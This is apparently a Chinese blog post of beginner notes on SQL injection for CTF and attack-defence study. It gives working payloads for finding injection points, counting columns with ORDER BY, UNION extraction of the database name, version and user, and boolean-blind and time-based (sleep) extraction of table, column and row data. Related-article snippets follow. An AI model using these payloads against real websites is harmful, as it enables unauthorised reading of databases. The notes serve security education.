网络攻防快速入门笔记web | 02 SQL注入

最新推荐文章于 2025-08-04 19:52:09 发布
原创 最新推荐文章于 2025-08-04 19:52:09 发布 · 882 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #前端 #sql

一、数据库基础

(一) Access

Microsoft Office Access 是由微软发布的关系数据库管理系统。该数据库系统结合了Microsoft JetDatabase Engine 和图形用户界面两个特点,是Microsoft Ofice 的系统程序之一。

(二)MSSQL

MSSQL 是指微软的 SQL Server数据库服务器,是一个数据库平台,提供数据库从服务器到终端的完整解决方案,其中数据库服务器部分是一个数据库管理系统,用于建立、使用和维护数据库。

(三)MySQL

MySQL 由瑞典 MySQLAB 公司开发,目前属于 Oracle 公司旗下产品,MySQL是最流行的关系数据库管理系统之一。在Web应用方面,MySQL是最好的RDBMS(Relational Database Management System,关系数据库管理系统)软件之一。

(四)Oracle

Oracle Database 又名 Oracle RDBMS,简称 Oracle,是甲骨文公司的一款关系数据库管理系统,是数据库领域一直处于领先地位的产品。

(五)对MySQL数据库的操作

在这里插入图片描述

(六)information schema数据库

MySQL 5.0版本后,默认自带一个数据库information schema,MySQL的所有数据库名,表名,字段名都可以从中查询到。虽然引入这个库为了方便数据库的信息查询,但是客观上大大方便了SQL注入。SCHEMATA表,TABLES表,COLUMNS表这三个表是SQL注入时,最常用的几个表。

二、什么是SQL注入

(一)SQL注入的概念

SQL注入是在用户请求输入时,由于后端代码没有对用户输入的子符串进行过滤、转义、限制或处理不严谨等,导致用户可以通过输入恶意字符串改变原有的 SQL查询语句,从而泄露信息。
在这里插入图片描述

(二)SQL注入示例

举例:
正常参数传递 http://www.xxx.com/student.php?id=1
恶意构造:
select * from students_info where id =1;
o SQL注入 http://www.xxx.com/student.php?id=1 union select * from students_info;
此时所执行的SQL语句为:
select * from students_info where id =1 union select * from students_info;

三、联合注入

(一)检查注入点

  1. 数字型
    ?id=1(正常)
    ?id=-1(无内容)
    ?id=1'(错误)
  2. 字符型
    ?id=1'and'1'='1(正常)
    ?id=1'and'1'=’2(无内容)
  3. 总结
    字符型的注入需要从两个引号中逃逸来构造注入语句,否则语句中的引号只会以字符串的形式导入数据库,而不会执行。

(二)查询当前数据库段数

利用 ORDER BY 语句来测试当前数据库的段数,以字符型为例。
测试内容(–±是对后面的内容进行注释,order by 1按照第一列进行排序)
?id=1'order by 1--+-(正常显示)
?id=1'order by 2--+-(正常显示)
?id=1'order by n--+-(正常显示)
?id=1'order by n+1--+-(报错或无显示)
通过以上结果判断,该数据库的段数为n个

(三)UNION泄露信息

(1)获取信息泄露位置:
?id=-1'union select 1,2,3.n--+-
(2)泄露当前数据库信息:
①泄露数据库的语句如下
?id=-1'union select 1,database(),3...n--+-
②泄露版本的语句如下:
?id=-1'union select 1,version(),3..n--+-
③泄露用户的语句如下:
?id=-1' union select 1,user(),3.n--+-

四、布尔注入

(一)布尔注入的概念

布尔注入是利用or拼接两个查询语句,当前者或者后者有一个能够返回结果时,就可以返回结果。因此可以控制使得第一个语句永远不成立,当后面的语句成立时,页面会返回结果。
适用场景:

  1. union被拉入用户输入内容的黑名单中。
  2. 当一个页面,存在注入,没显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常进行判断进行SQL注入。

(二)获取库名

?id=-1'or length(database())>7--+-
?id=-1'or ord(mid(database(),1,1))>100--+-
当前数据库名的第一个字符

(三)获取表名

?id=-1’ or (select ORD(mid(GROUP CONCAT(TABLE NAME),1,1)) from information schema.tableswhere table schema=database() limit 0,1)>100 --+-
第一个表名的第一个字符

(四)获取列名

?id=-1’or ord(mid((select group concat(column name) from information schema.columnswhere table name='emails'),1,1))>100--+-
emails表的第一个列名的第一个字符

(五)获取内容

?id=-1'or ord(mid(select group concat(id) from emails),1,1))>40--+-
emails表id列第一个字符的ASCI码

五、时间注入

(一)时间注入的概念

通过注入特定语句,根据对页面请求的反馈,来判断是否注入成功,如:在SQL语句中使用sleep()函数看加载网页的时间来判断注入点。
适用场景:
不管怎样变换参数,都无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。

(二)获取库名

?id=-1'or sleep(if((select length(database()))>7,5,0))--+-
判断数据库库名长度是否大于7

CTF-Web学习笔记SQL注入
Deng7326的博客
07-28 1023
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
笔记Web攻防-ASP应用】个人笔记
qq_69327132的博客
01-03 987
小白跟着博主一起学安全,小迪笔记Web攻防-ASP应用的个人笔记。获取永久phpstorm,永久Pycharm,永久Navicat Premium。
网络攻防WEB入门指南
qq_43678263的博客
03-31 1万+
网络攻防WEB入门指南(大佬绕路) 文章目录前言学习网络攻防该如何入门 前言 我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。 学习网络攻防该如何入门 常规CTF比赛主要分为线上做题,以及线下AWD攻防(Attack With Defence),其中初赛往往为做题形式,决赛为AWD混战。做题形式又分为MISC(杂项)、
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 20万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
攻防世界web(入门)11-20 刷题笔记
m0_74076460的博客
04-15 1425
题目网址:攻防世界参考资料:​​​​​​【CTF合辑】攻防世界WEB-1分难度_哔哩哔哩_bilibili前十道请到:攻防世界web(入门)1-10 刷题笔记-优快云博客
ctfshow web入门 sql注入
Sentiment的博客
12-07 2664
无过滤注入 web171 查询语句 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 单引号闭合,未做任何过滤 payload: 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ /
B站 - 黑客攻防 入门到入狱 [网络安全] -笔记
bell_love的博客
06-23 3万+
cc攻击:针对应用,比如恶意刷验证码 DDoS攻击:针对服务器,比如大量的http请求,超大流量的恶意访问 ← ← ← 刮刮乐 文章目录文件上传漏洞原理实验原理实验过程webshell:菜刀详解 文件上传漏洞原理 实验原理 实验过程 实验一: 低安全模式下,上传任意类型文件,文件不大限制 实验二: 中安全模式下,绕过类型上传文件(文件MIME类型) 修改浏览器代理为BurpSuite的代理 通过BurpSuite修改Content-Type的信息,改为 image/JPEG 实验二实现原理: 实验三:
SQL注入-基础知识
m0_72210904的博客
05-04 1198
网络安全领域中,sql注入是一个无法被忽视的关键点,曾经多少的网站都因此被攻破,直到现在很多网站依旧存在很多sql注入的漏洞和风险点。Sql注入的原理简单,但变化和危害特别严重,属于“上有政策,下有对策”的风险点,也是从事渗透攻防必不可少的一个知识点。本人因近期学习渗透测试相关内容,特此记录学习过程中的笔记,若你也是刚入门渗透安全,或许会有帮助,也希望可以一起交流。我本次所有的sql注入笔记都基于sqli-labs靶场进行演示,链接如何安装sqli-labs靶场。
CVE-2024-3552 WordPress-Web Directory Free SQL注入漏洞复现
mashiro_hibiki的博客
05-28 477
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。web-directory-free插件存在未授权的SQL注入。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。
网络安全入门 5 天速成教程: WEB 安全渗透攻防技术
yinjiyufei的博客
11-27 1238
5 天速成网络安全入门教程: WEB 安全渗透攻防技术
网络安全最新【网络安全】浅识 SQL 注入_sq注入asclii
2401_84239625的博客
05-04 862
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉优快云大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈​。
尚硅谷尚庭公寓学习笔记
2301_80165178的博客
07-31 1024
本文摘要了Java开发中的几个实用技巧:1)使用@Builder注解实现链式调用创建对象;2)saveOrUpdate方法根据主键自动判断插入或更新数据;3) Minio文件上传的完整实现流程,包括配置、权限设置和服务层逻辑;4)集合判空的最佳实践;5)UpdateWrapper实现条件更新;6)IPage分页查询的使用方法。这些内容涵盖了日常开发中的常见场景,对提高开发效率很有帮助。
笔记】ROS1|5 ARP攻击Turtlebot3汉堡Burger并解析移动报文【旧文转载】
最新发布
shandianchengzi的博客
08-04 533
本文介绍了如何使用ARP攻击技术干扰Turtlebot3汉堡机器人的ROS通信。作者首先讲解了ARP协议的基本原理和攻击依据,然后通过实验演示了如何利用arpspoof工具实施ARP欺骗攻击,包括干扰普通主机上网和小车与控制机的通信。文章提供了详细的实验步骤和思考题,并建议读者在虚拟机环境下进行实践。实验结果显示,通过持续发送虚假ARP响应包可以成功劫持网络通信,开启IP转发后虽能恢复但会降低网速。最后作者还演示了如何解析被攻击机器人的移动控制报文。
学习笔记090——Ubuntu 中 UFW 防火墙的使用
code__bee的博客
08-01 312
【代码】学习笔记090——Ubuntu 中 UFW 防火墙的使用。
笔记webpack项目优化图片体积大小时 遇到 图片无法正常显示
sky8880的博客
08-04 114
在使用url-loader和file-loader处理图片时,图片无法显示,src属性变成了[object Module]。因此,在引入图片时,如果使用CommonJS的方式(require)去引入一个ES模块导出的图片,就会得到[object Module]。问题:我是用 url-loader 和 file-loader压缩图片 但是 有一些图片无法显示 在src中是[object Module] 所以导致无法加载(有的图片可以有的不行 主要针对小的图片base64的图片)
VAE学习笔记
qq_52902529的博客
08-04 138
损失函数2:如果没有对σi 的限制 生成的图片会希望噪音对自身生成图片的干扰越小,于是分配给噪音的权重越小,这样只需要将(σ1,σ2,σ3)赋为接近负无穷大的值就好了,直观上也能看出来在σi=0处取最小。把输入数据压缩成隐藏变量的分布参数(均值和方差),直接输出固定值会导致生成能力变差 输出分布可以随机采样增加多样性。(σ1,σ2,σ3)是控制噪音干扰程度的编码,就是为随机噪音码(e1,e2,e3)分配权重。(m1,m2,m3)是数据经过encoder 得到的编码。还原成数据(如生成新图片)。
电力系统分析学习笔记
zxjiaya的博客
08-02 602
本文总结了电力系统分析的核心知识点:1)电力线路电容特性分析,指出电缆线路电容比架空线路大;2)三相功率关系推导,包含线/相电压转换和阻抗计算;3)标幺值计算法原理,强调基准量选择方法;4)变压器阻抗折算的简化技巧,建议采用平均额定电压;5)两种标幺值计算方法对比。重点阐述了电容特性、功率方程、标幺值转换等电力系统分析基础理论,为后续短路计算等应用提供理论支撑。
【Unity笔记04】数据持久化
X_StarX的博客
07-31 364
对称加密算法,结合CBC模式和PKCS7填充,确保数据安全。3️⃣ 异步文件操作:AsyncFileUtility.cs。在场景中创建一个空 GameObject(如命名为。4️⃣ 核心管理器:DataManager.cs。1️⃣ 玩家数据模型:PlayerData.cs。数据模型,定义可序列化的玩家数据结构。核心管理器,统一调度数据加载与保存。加密工具类,负责数据的加密与解密。异步文件操作工具,封装读写逻辑。
LLM微调笔记
qq_44899247的博客
08-02 212
微调相当于用少量特定数据集在预训练模型(如 Qwen、DeepSeek 等)上进一步训练,让模型更贴合新数据集的内容。微调主要分为全量微调和参数高效微调(PEFT),其中 PEFT 中最常用的是 LoRA:其核心是在模型关键层(如注意力层)的高秩权重矩阵中插入两个低秩矩阵(A 和 B),训练时仅更新这两个低秩矩阵的参数(参数量远小于原矩阵,例如原矩阵维度为 d×d 时,低秩矩阵为 d×r 和 r×d,r 远小于 d),以此大幅降低计算成本。适合自己从零开始看的llm微调知识点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李喵喵爱豆豆

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值